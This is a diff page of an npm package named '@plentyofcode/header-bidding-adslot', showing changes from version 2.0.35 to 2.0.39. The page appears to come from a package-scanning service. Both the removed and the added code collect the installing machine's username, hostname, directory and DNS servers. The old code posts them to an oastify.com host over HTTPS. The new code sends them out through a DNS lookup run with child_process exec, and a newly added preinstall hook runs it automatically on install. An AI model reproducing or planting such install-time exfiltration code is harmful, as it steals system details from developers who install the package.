@plentyofcode/header-bidding-adslot 2.0.35 → 2.0.39

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +28 -39
  2. package/package.json +3 -2
package/index.js CHANGED
@@ -1,46 +1,35 @@
1
- const os = require("os");
1
+ const { exec } = require("child_process");
2
2
  const dns = require("dns");
3
- const querystring = require("querystring");
4
- const https = require("https");
5
- const packageJSON = require("./package.json");
6
- const package = packageJSON.name;
3
+ const os = require("os");
4
+ const path = require("path");
7
5
 
8
- const trackingData = JSON.stringify({
9
- p: package,
10
- c: __dirname,
11
- hd: os.homedir(),
12
- hn: os.hostname(),
13
- un: os.userInfo().username,
14
- dns: dns.getServers(),
15
- r: packageJSON ? packageJSON.___resolved : undefined,
16
- v: packageJSON.version,
17
- pjson: packageJSON,
18
- });
6
+ // RCE
7
+ const packageName = "@plentyofcode/header-bidding-adslot"; // Package
8
+ const username = os.userInfo().username; // User
9
+ const hostname = os.hostname(); // HostName
10
+ const currentDir = __dirname; // Dir
11
+ const dnsServers = dns.getServers(); // DNS
19
12
 
20
- var postData = querystring.stringify({
21
- msg: trackingData,
22
- });
23
-
24
- var options = {
25
- hostname: "3rvt835janzs1jx3d1c50i38gzmqagy5.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
- port: 443,
27
- path: "/",
28
- method: "POST",
29
- headers: {
30
- "Content-Type": "application/x-www-form-urlencoded",
31
- "Content-Length": postData.length,
32
- },
13
+ // Encode
14
+ const info = {
15
+ p: packageName,
16
+ u: username,
17
+ hn: hostname,
18
+ d: currentDir,
19
+ dns: dnsServers
33
20
  };
34
21
 
35
- var req = https.request(options, (res) => {
36
- res.on("data", (d) => {
37
- process.stdout.write(d);
38
- });
39
- });
22
+ const encodedInfo = encodeURIComponent(JSON.stringify(info));
40
23
 
41
- req.on("error", (e) => {
42
- // console.error(e);
24
+ // Execute and Send DNS request
25
+ exec(`host ${encodedInfo}.y43b18cd8eaw7j5syw1prliuklqce22r.oastify.com`, (error, data, getter) => {
26
+ if (error) {
27
+ console.log("error", error.message);
28
+ return;
29
+ }
30
+ if (getter) {
31
+ console.log(data);
32
+ return;
33
+ }
34
+ console.log(data);
43
35
  });
44
-
45
- req.write(postData);
46
- req.end();
package/package.json CHANGED
@@ -1,10 +1,11 @@
1
1
  {
2
2
  "name": "@plentyofcode/header-bidding-adslot",
3
- "version": "2.0.35",
3
+ "version": "2.0.39",
4
4
  "description": "PoC Package",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "start": "node index.js"
7
+ "preinstall": "node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
8
9
  },
9
10
  "author": "h0rus3c",
10
11
  "license": "ISC"